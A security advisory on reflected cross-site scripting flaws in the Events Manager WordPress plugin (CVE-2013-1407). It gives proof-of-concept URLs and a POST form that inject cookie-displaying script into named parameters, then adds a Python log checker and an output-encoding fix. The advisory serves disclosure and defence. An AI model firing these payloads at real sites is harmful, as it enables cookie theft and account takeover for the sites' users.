High-Tech Bridge Security Advisory HTB23139
Multiple XSS vulnerabilities in Events Manager WordPress plugin
Published: January 16, 2013
Source: High-Tech Bridge, www.htbridge.com

CVSS2 score: 4.3 (Medium)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE
EPSS: 0.002 (Low), percentile 60.5%

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in the Events Manager WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks.

1. Multiple XSS vulnerabilities in Events Manager WordPress plugin: CVE-2013-1407

1.1 The vulnerability exists due to insufficient filtering of user-supplied data in the "scope" HTTP GET parameter passed to the "/index.php" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display the user's cookies:
http://[host]/?page_id=42&scope=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E,%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient filtering of user-supplied data in the "_wpnonce" HTTP GET parameter passed to the "/wp-admin/edit.php" script. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display the administrator's cookies:
http://[host]/wp-admin/edit.php?post_type=event&page=events-manager-bookings&_wpnonce=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.3 The vulnerabilities exist due to insufficient filtering of user-supplied data in the "user_name", "dbem_phone" and "user_email" HTTP GET parameters passed to the "/index.php" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
PoCs (Proof-of-Concept) below use the "alert()" JavaScript function to display the user's cookies:
http://[host]/?event=1&user_name=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/?event=1&dbem_phone=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/?event=1&user_email=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.4 The vulnerability exists due to insufficient filtering of user-supplied data in the "booking_comment" HTTP POST parameter passed to the "/index.php" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display the user's cookies:
<form action="http://[host]/?event=1" method="post" name="askform">
<input type="hidden" name="booking_comment" value="</textarea><script>alert(document.cookie);</script>"/>
<input type="submit" id="btn">
</form>
Vulnerabilities 1.3 and 1.4 work only against unauthenticated (not logged-in) users. Successful exploitation of these vulnerabilities also requires that the event with id = 1 has registration enabled.
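Added example, not part of the High-Tech Bridge advisory or of the plugin's code: a small Python checker that a site operator can run over web server access logs to find requests carrying markup in the GET parameters named above (issues 1.1 to 1.3), together with the output-encoding step that removes the reflection problem. Only the parameter names and script paths come from the advisory; the log format, the regular expression, the sample log lines and the IP addresses are constructed assumptions, and the POST parameter from issue 1.4 is deliberately out of scope because it never appears in a request line.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Query parameters that advisory HTB23139 (CVE-2013-1407) reports as reflected
# without sufficient filtering. booking_comment (issue 1.4) is a POST parameter,
# so it never appears in the request line of an access log and is not covered here.
WATCHED_PARAMS = {"scope", "_wpnonce", "user_name", "dbem_phone", "user_email"}

# Characters needed to break out of an HTML attribute or tag when a value is
# reflected unescaped; a legitimate scope, nonce, name or e-mail never contains them.
BREAKOUT_CHARS = set('<>"\'')

# Apache/nginx "combined" access log format (assumed), reduced to the fields used below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Split one access-log line into ip, method, path and decoded query params.
    Returns None for lines that do not match the expected format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        # parse_qs percent-decodes once; keep_blank_values keeps e.g. "scope=".
        "params": parse_qs(parts.query, keep_blank_values=True),
    }


def suspicious_params(params):
    """Return {name: decoded_value} for watched parameters whose value contains
    markup breakout characters. Values are decoded twice more so that
    double-encoded payloads (%2522 -> %22 -> ") are judged in their final form."""
    hits = {}
    for name, values in params.items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = unquote_plus(unquote_plus(value))
            if BREAKOUT_CHARS & set(decoded):
                hits[name] = decoded
    return hits


def scan(lines):
    """Run the check over an iterable of log lines and collect findings in order."""
    findings = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        hits = suspicious_params(record["params"])
        if hits:
            findings.append({"ip": record["ip"], "path": record["path"], "params": hits})
    return findings


def escape_for_attribute(value):
    """Output encoding for a value placed inside an HTML attribute or text node,
    equivalent in effect to WordPress esc_attr()/esc_html(): the breakout
    characters become entities, so the value can no longer close the attribute
    or open a tag. This is the fix the advisory's findings call for."""
    return escape(value, quote=True)


# Constructed sample log lines (203.0.113.x / 198.51.100.x are documentation
# addresses); the request targets mirror the parameter names from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jan/2013:10:00:01 +0000] "GET /?page_id=42&scope='
    '%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Jan/2013:10:00:02 +0000] "GET /?page_id=42&scope=future '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [16/Jan/2013:10:00:03 +0000] "GET /?s=%3Cb%3E HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0"',
    '203.0.113.9 - - [16/Jan/2013:10:00:04 +0000] "GET /wp-admin/edit.php?post_type=event'
    '&page=events-manager-bookings&_wpnonce=%22%3E%3Cscript%3E HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [16/Jan/2013:10:00:05 +0000] "GET /?event=1&user_email='
    '%2527%253E%253Cscript%253E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    'this line is not in combined log format',
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["path"], finding["params"])
    # The same payload after output encoding: harmless text, not markup.
    print(escape_for_attribute('"><script>alert(1)</script>'))
```

The checker is deliberately limited to the parameters the advisory names, so an unrelated search term containing "<b>" (third sample line) is not reported; widen WATCHED_PARAMS if the site reflects other parameters. A 200 status on a flagged request does not by itself prove the payload executed, only that the server answered it, so the matching response should still be inspected.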

Affected software (CPE)
  Name: events manager wordpress plugin
  Operator: le (less than or equal to)
  Version: 5.3.3
